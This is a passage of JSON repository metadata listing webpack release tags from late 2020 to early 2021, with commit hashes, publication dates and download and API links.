webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b29